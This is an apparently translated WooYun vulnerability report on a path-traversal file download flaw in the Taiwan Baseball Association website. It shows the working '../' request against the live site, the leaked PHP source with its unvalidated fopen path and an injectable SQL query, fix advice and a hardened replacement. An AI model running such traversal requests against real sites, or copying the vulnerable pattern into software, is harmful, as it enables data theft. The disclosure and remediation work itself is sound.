Vulnerability Summary

Defect ID: wooyun-2015-0128144

Title: Arbitrary file download in the Taiwan Baseball Association (台湾棒球协会) website

Affected vendor: Taiwan Baseball Association (台湾棒球协会)

Author: 路人甲

Submitted: 2015-07-22 15:08

Fixed: 2015-09-05 17:24

Published: 2015-09-05 17:24

Vulnerability type: arbitrary file traversal/download

Severity: High

Self-assessed Rank: 13

Status: handed over to a third-party partner organisation (Hitcon Taiwan Internet Vulnerability Reporting Platform) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability Details

Disclosure status:

2015-07-22: details sent to the vendor; awaiting vendor handling
2015-07-22: vendor confirmed; details visible to the vendor only
2015-08-01: details disclosed to core white hats and relevant domain experts
2015-08-11: details disclosed to regular white hats
2015-08-21: details disclosed to intern white hats
2015-09-05: details disclosed to the public

Brief description:

Detailed description:

1. When downloading a file from http://www.ctba.org.tw/download.php, the request is redirected to http://www.ctba.org.tw/func_file_download.php?filename=%25E6%2597%2585%25E5%25A4%2596%25E9%2581%25B8%25E6%2589%258B%25E7%25A9%25BA%25E7%2599%25BD%25E5%258D%2594%25E8%25AD%25B0%25E6%259B%25B8%25E8%258B%25B1%25E6%2596%2587%25E7%2589%2588.doc

[Image: 545.jpg]

2. A casual test of the script did not hit: http://www.ctba.org.tw/func_file_download.php?filename=func_file_download.php
3. Going one directory level up did hit:
http://www.ctba.org.tw/func_file_download.php?filename=../func_file_download.php

[Image: 546.jpg]

4. The rest is just packing things up and carrying them out XD

Proof of vulnerability:

The source code of func_file_download.php is as follows

<?php
// go
$base_dir = '/home/ctba';
$base_inc_dir = '/home/ctba/include';
include("/home/ctba/include/web_basic_data.php");
include("/home/ctba/include/mysql/db_connect.php");
include("/home/ctba/include/functions/functions.inc.php");
include("/home/ctba/include/properties.inc.php");
$path = 'file';
// download files attached to news articles
// $file, $id and $filename arrive straight from the request; nothing below validates $filename
if( $file>=1 && $file<=20){
$path = 'download';
$q = "SELECT * FROM ctba.articles_data ";
$q .= "WHERE Articles_Auto_Serial = '$id' and articles_status > 0 ";
$db->query($q);
$db->next_record();
switch($file) {
case 1: $filename = $db->f("Articles_Word_File"); break;
case 2: $filename = $db->f("Articles_Word_File2"); break;
case 3: $filename = $db->f("Articles_Word_File3"); break;
case 4: $filename = $db->f("Articles_Word_File4"); break;
case 5: $filename = $db->f("Articles_Word_File5"); break;
case 6: $filename = $db->f("Articles_Word_File6"); break;
case 7: $filename = $db->f("Articles_Word_File7"); break;
case 8: $filename = $db->f("Articles_Word_File8"); break;
case 9: $filename = $db->f("Articles_Word_File9"); break;
case 10: $filename = $db->f("Articles_Word_File10"); break;
case 11: $filename = $db->f("Articles_Word_File11"); break;
case 12: $filename = $db->f("Articles_Word_File12"); break;
case 13: $filename = $db->f("Articles_Word_File13"); break;
case 14: $filename = $db->f("Articles_Word_File14"); break;
case 15: $filename = $db->f("Articles_Word_File15"); break;
case 16: $filename = $db->f("Articles_Word_File16"); break;
case 17: $filename = $db->f("Articles_Word_File17"); break;
case 18: $filename = $db->f("Articles_Word_File18"); break;
case 19: $filename = $db->f("Articles_Word_File19"); break;
case 20: $filename = $db->f("Articles_Word_File20"); break;
default: $filename = $db->f("Articles_Word_File"); break;
}
}
// the decoded name is only used for the download header, not for the file path
$real_filename = urldecode($filename) ;
$browser_agent = 'ie' ;
$real_filename = ($browser_agent == 'ie' || $browser_agent == 'opera')? mb_convert_encoding($real_filename,"BIG5","UTF-8"):$real_filename;
/*
header('Pragma: public');
header('Expires: 0');
header('Last-Modified: ' . gmdate('D, d M Y H:i ') . ' GMT');
header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
header('Cache-Control: private', false);
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . $real_filename. '";');
header('Content-Transfer-Encoding: binary');
*/
header("Content-Disposition: attachment; filename=".$real_filename."\n");
header("Content-type: application/x-download");
header("Content-Description: PHP5 Generated Data");
// the unvalidated $filename is concatenated into the path; "../" walks out of $base_dir.$path
$fp=fopen($base_dir.$path.'/'.$filename, "r");
fpassthru($fp);
?>

Fix recommendation:

The problem is at line 66 of func_file_download.php

$fp=fopen($base_dir.$path.'/'.$filename, "r");


So at line 65 the $filename variable should be checked, and ../ and ..\ path traversal rejected

if (strstr($filename, '..')) return;


Then normalise it and verify that it has the form filename.doc

if (!preg_match('/\.doc$/', $filename)) return;
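As an added example (not the report's or the site's own code), the following hardened replacement for the fopen()/fpassthru() tail goes beyond the suggested '..' substring check: it refuses any directory component, allow-lists the name and extension, and canonicalises with realpath() so that symlinks and anything the string checks cannot see are still confined to the download root. It assumes $base_dir and $path are the variables the original script already sets; safe_download_path() and the joining of $base_dir and $path with '/' are my assumptions.

```php
<?php
// Added example, not the report's or the site's own code. Assumed: $base_dir and $path
// are the variables the original script already sets; everything else is hypothetical.
declare(strict_types=1);

/**
 * Resolve a user-supplied file name to an absolute path inside $root,
 * or return null if the request must be refused.
 */
function safe_download_path(string $root, string $filename): ?string
{
    // 1. Accept a bare file name only: if basename() changes the string,
    //    it carried a directory component, so refuse rather than rewrite.
    $name = urldecode($filename);
    if ($name === '' || basename($name) !== $name) {
        return null;
    }
    // 2. Allow-list the name (ASCII word chars, CJK, space, dash, dot)
    //    and the extension, instead of black-listing "..".
    if (!preg_match('/^[\w \-.\x{4e00}-\x{9fff}]+\.(doc|docx|pdf)$/u', $name)) {
        return null;
    }
    // 3. Canonicalise and confirm the result still lies under $root;
    //    this also catches symlinks that the string checks cannot see.
    $rootReal = realpath($root);
    $full     = realpath($root . DIRECTORY_SEPARATOR . $name);
    if ($rootReal === false || $full === false || !is_file($full)
        || strpos($full, $rootReal . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $full;
}

// Replacement for the original's fopen()/fpassthru() tail.
$full = safe_download_path($base_dir . '/' . $path, $_GET['filename'] ?? '');
if ($full === null) {
    http_response_code(404);   // do not reveal whether the path existed
    exit;
}
header('Content-Type: application/octet-stream');
// Quoted and derived from the resolved path, not from the raw request.
header('Content-Disposition: attachment; filename="' . basename($full) . '"');
header('Content-Length: ' . (string) filesize($full));
readfile($full);
```

The database-selected branch of the original (cases 1 to 20) should be routed through the same function, since a stored file name is only as trustworthy as whoever wrote it into the table.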


Copyright notice: please credit 路人甲@乌云 when reposting


Vendor Response

Vendor response:

Severity: High

Vulnerability Rank: 15

Confirmed: 2015-07-22 17:23

Vendor reply:

Thanks for the notification!

Latest status:

None yet